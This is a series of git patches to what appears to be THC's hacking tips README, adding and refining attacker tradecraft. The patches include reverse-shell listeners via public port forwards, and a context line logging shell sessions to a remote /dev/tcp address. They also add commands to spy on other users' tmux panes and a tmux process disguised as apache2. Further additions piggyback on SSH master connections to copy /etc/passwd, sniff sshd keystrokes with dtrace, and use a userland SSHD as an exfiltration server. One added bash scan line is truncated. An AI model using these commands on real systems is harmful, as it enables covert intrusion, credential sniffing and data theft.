From 873529d486268a5efac97b227dca145919e4e658 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 23 Nov 2023 09:52:38 +0000
Subject: [PATCH 01/12] Update README.md
---
README.md | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/README.md b/README.md
index 0171e34..2950f6d 100644
--- a/README.md
+++ b/README.md
@@ -502,6 +502,8 @@ socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465
Using [segfault.net](https://thc.org/segfault.net) (free):
```sh
+# Request a random public TCP port:
+curl sf/port
echo "Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)"
nc -vnlp $(cat /config/self/reverse_port)
```
@@ -512,6 +514,12 @@ Using [bore.pub](https://github.com/ekzhang/bore) (free):
bore local 31337 --to bore.pub
```
+using [serveo.net](https://serveo.net) (free):
+```sh
+# Forward a random public TCP port to localhost:31337
+ssh -R 0:localhost:31337 serveo.net
+```
+
See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from the target to your workstation or [ngrok](https://ngrok.com/) (paid subscription) to forward a raw public TCP port.
Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets).
From 4996d26fa389c256441c7625498acf111fd54d30 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 23 Nov 2023 17:08:28 +0000
Subject: [PATCH 02/12] Update README.md
---
README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 2950f6d..74086df 100644
--- a/README.md
+++ b/README.md
@@ -1724,7 +1724,7 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
-**9.ii Sniff all SHELL sessions with dtrace**
+**9.ii Sniff all SHELL sessions with dtrace - FreeBSD**
Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes.
@@ -1744,7 +1744,7 @@ Start a dtrace and log to /tmp/.log:
```
-**9.iii Sniff all SHELL sessions with eBPF**
+**9.iii Sniff all SHELL sessions with eBPF - Linux**
eBPF allows us to *safely* hook over 120,000 functions in the kernel. It's like a better "dtrace" but for Linux.
From 1bea742410d05dd7cb97dd17225dede414304c77 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Dec 2023 19:12:44 +0000
Subject: [PATCH 03/12] Update README.md
---
README.md | 12 +++++++-----
1 file changed, 7 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index 74086df..cc0e9c0 100644
--- a/README.md
+++ b/README.md
@@ -2034,14 +2034,16 @@ Mindmaps & Knowledge
1. https://github.com/ibraheemdev/modern-unix
-**12.iii. tmux**
+**12.iii. Tmux Cheat Sheet**
+
| | Tmux Cheat Sheet |
| --- | --- |
-| Save Scrollback | ```Ctrl+b``` + ```:```, then type ```capture-pane -S -``` followed by ```Ctrl+b``` + ```:``` and type ```save-buffer filename.txt```. |
-| Attach | Start a new tmux, then type ```Ctrl+b``` + ```s``` and use ```LEFT```, ```RIGHT``` to expand and select any session. |
-| Logging | ```Ctrl+b``` + ```Shift + P``` to start and stop. |
-| Menu | ```Ctrl+b``` + ```>```. Then use ```Ctrl+b``` + ```UP```, ```DOWN```, ```LEFT``` or ```RIGHT``` to move between the panes. |
+| Save Scrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. |
+| Spy Scrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |
+| Logging | `Ctrl+b` + `Shift + P` to start and stop. |
+| Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. |
+| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
**12.iv. Useful commands**
From 39d5f5263cc76f832018da58f4dcdc6675a53223 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Dec 2023 19:13:05 +0000
Subject: [PATCH 04/12] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index cc0e9c0..5f8d20a 100644
--- a/README.md
+++ b/README.md
@@ -100,7 +100,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Miscellaneous](#misc)
1. [Tools of the trade](#tools)
1. [Cool Linux commands](#cool-linux-commands)
- 1. [tmux](#tmux)
+ 1. [tmux Cheat Sheet](#tmux)
1. [Useful commands](#useful-commands)
1. [Other Sites](#others)
From fe57305a0c1ae8c55445c7afa0ec09909962d9d4 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Dec 2023 19:15:26 +0000
Subject: [PATCH 05/12] Update README.md
---
README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 5f8d20a..8e5fce7 100644
--- a/README.md
+++ b/README.md
@@ -2039,8 +2039,8 @@ Mindmaps & Knowledge
| | Tmux Cheat Sheet |
| --- | --- |
-| Save Scrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. |
-| Spy Scrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |
+| SaveScrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. |
+| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |
| Logging | `Ctrl+b` + `Shift + P` to start and stop. |
| Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. |
| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
From 96f6e7da7100a15244dd0f037dfd392b8b1e1ff1 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Dec 2023 19:33:04 +0000
Subject: [PATCH 06/12] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index 8e5fce7..b914e60 100644
--- a/README.md
+++ b/README.md
@@ -2041,6 +2041,7 @@ Mindmaps & Knowledge
| --- | --- |
| SaveScrollback | `Ctrl+b` + `:`, then type `capture-pane -S -` followed by `Ctrl+b` + `:` and type `save-buffer filename.txt`. |
| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |
+| Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. |
| Logging | `Ctrl+b` + `Shift + P` to start and stop. |
| Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. |
| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
From c2c5a744f9661f620c091ab1e39106874703247a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Dec 2023 21:30:52 +0000
Subject: [PATCH 07/12] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index b914e60..ab57fa0 100644
--- a/README.md
+++ b/README.md
@@ -2043,6 +2043,7 @@ Mindmaps & Knowledge
| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |
| Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. |
| Logging | `Ctrl+b` + `Shift + P` to start and stop. |
+| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && tmux -S .$'\t'cache a` |
| Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. |
| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
From 1668828b9b92d5a82f8b393be30fe27c5c90b828 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Dec 2023 21:32:59 +0000
Subject: [PATCH 08/12] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index ab57fa0..b46ddb0 100644
--- a/README.md
+++ b/README.md
@@ -2043,7 +2043,7 @@ Mindmaps & Knowledge
| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |
| Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. |
| Logging | `Ctrl+b` + `Shift + P` to start and stop. |
-| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && tmux -S .$'\t'cache a` |
+| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache attach` |
| Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. |
| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
From 4f5280c300a7378509718874c88da3627d4d74fd Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 6 Dec 2023 21:34:17 +0000
Subject: [PATCH 09/12] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index b46ddb0..9036e42 100644
--- a/README.md
+++ b/README.md
@@ -2043,7 +2043,7 @@ Mindmaps & Knowledge
| SpyScrollback | `tmux capture-pane -e -pS- -t 6.0` to capture pane 6, window 0 of a running tmux. Remove `-e` to save without colour. |
| Clear | `tmux send-keys -R C-l \; clear-history -t6.0` to clear screen and delete scrollback history. |
| Logging | `Ctrl+b` + `Shift + P` to start and stop. |
-| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`. To attach to your session do `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache attach` |
+| HiddenTmux | `cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache`
To attach to your session do
`cd /dev/shm && zapper -fa '/usr/sbin/apache2 -k start' tmux -S .$'\t'cache attach` |
| Attach | Start a new tmux, then type `Ctrl+b` + `s` and use `LEFT`, `RIGHT` to preview and select any session. |
| Menu | `Ctrl+b` + `>`. Then use `Ctrl+b` + `UP`, `DOWN`, `LEFT` or `RIGHT` to move between the panes. |
From 9ac2af6aaf385394e344c8a6d5fc2268b1dc094c Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 7 Dec 2023 10:10:07 +0000
Subject: [PATCH 10/12] Update README.md
---
README.md | 31 +++++++++++++++++++++++++------
1 file changed, 25 insertions(+), 6 deletions(-)
diff --git a/README.md b/README.md
index 9036e42..7f442f8 100644
--- a/README.md
+++ b/README.md
@@ -21,6 +21,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Execute in parrallel with separate logfiles](#parallel)
1. [SSH](#ssh)
1. [Almost invisible SSH](#ssh-invisible)
+ 1. [Multiple shells via 1 SSH/TCP connection](#ssh-master)
1. [SSH tunnel](#ssh-tunnel)
1. [SSH socks5 tunnel](#ssh-socks-tunnel)
1. [SSH to NATed host](#ssh-j)
@@ -334,8 +335,26 @@ thcssh()
}
```
+
+**2.ii Multiple shells via 1 SSH/TCP connection**
+
+Have one TCP connection to the target and allow multiple users to piggyback on the same TCP connection to open further shell sessions.
+
+Create a Master Connection:
+```sh
+ssh -M -S .sshmux user@server.org
+```
+
+Create further shell-sessions using the same (single) Master-TCP connection from above (no password/auth needed):
+```sh
+ssh -S .sshmux NONE
+#ssh -S .sshmux NONE ls -al
+#scp -o "ControlPath=.sshmux" NONE:/etc/passwd .
+```
+Can be combined with [thcssh](#ssh-invisible) to hide from utmp.
+
-**2.ii SSH tunnel**
+**2.iii SSH tunnel**
We use this all the time to circumvent local firewalls and IP filtering:
```sh
@@ -352,7 +371,7 @@ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org
Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).
-**2.iii SSH socks4/5 tunnel**
+**2.iv SSH socks4/5 tunnel**
OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.
@@ -370,7 +389,7 @@ ssh -g -R 1080 user@server.org
The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to *any* computer on *any port* that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).
-**2.iv SSH to a host behind NAT**
+**2.v SSH to a host behind NAT**
[ssh-j.com](http://ssh-j.com) provides a great relay service: To access a host behind NAT/Firewall (via SSH).
@@ -400,7 +419,7 @@ The ssh connection goes via ssh-j.com into the reverse tunnel to the host behind
-**2.v SSH pivoting to multiple servers**
+**2.vi SSH pivoting to multiple servers**
SSH ProxyJump can save you a lot of time and hassle when working with remote servers. Let's assume the scenario:
@@ -427,9 +446,9 @@ kali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135
> We use this as well to hide our IP address when logging into servers.
-**2.vi SSHD as user land**
+**2.vii SSHD as user land**
-It is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing):
+It is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing) or as a quick exfil-dump-server that runs as non-root:
```sh
# On the server, as non-root user 'joe':
mkdir -p ~/.ssh 2>/dev/null
From 04efdf574e2fa39dcb9a7758b9b6c2c7d7cdbfab Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 8 Dec 2023 08:23:18 +0000
Subject: [PATCH 11/12] Update README.md
---
README.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/README.md b/README.md
index 7f442f8..7fd218a 100644
--- a/README.md
+++ b/README.md
@@ -735,6 +735,11 @@ nmap -sCV -F -Pn --min-rate 10000 scanme.nmap.org
nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org
```
+Using bash:
+```shell
+timeout 5 bash -c "
**3.viii. Crack Password hashes**
From 3f3b656c37bfec8e2d1c1572ca721f207c84f202 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 8 Dec 2023 12:30:37 +0000
Subject: [PATCH 12/12] Update README.md
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 7fd218a..0a4481f 100644
--- a/README.md
+++ b/README.md
@@ -324,7 +324,7 @@ thcssh()
{
local ttyp
echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m"
- echo -e "PS1='"'{THC} \[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'\e[0m"
+ echo -e "PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'\e[0m"
ttyp=$(stty -g)
stty raw -echo opost
[[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no"
@@ -1418,7 +1418,7 @@ export TERM=xterm-256color
reset
stty rows 24 columns 120
# Pimp up your prompt
-PS1='{THC} USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
+PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
```
@@ -1757,7 +1757,7 @@ Copy this "D Script" to the target system to a file named `d`:
#pragma D option quiet
inline string NAME = "sshd";
syscall::write:entry
-/(arg0 >= 7) && (arg2 <= 16) && (execname == NAME)/
+/(arg0 >= 5) && (arg2 <= 16) && (execname == NAME)/
{ printf("%d: %s\n", pid, stringof(copyin(arg1, arg2))); }
```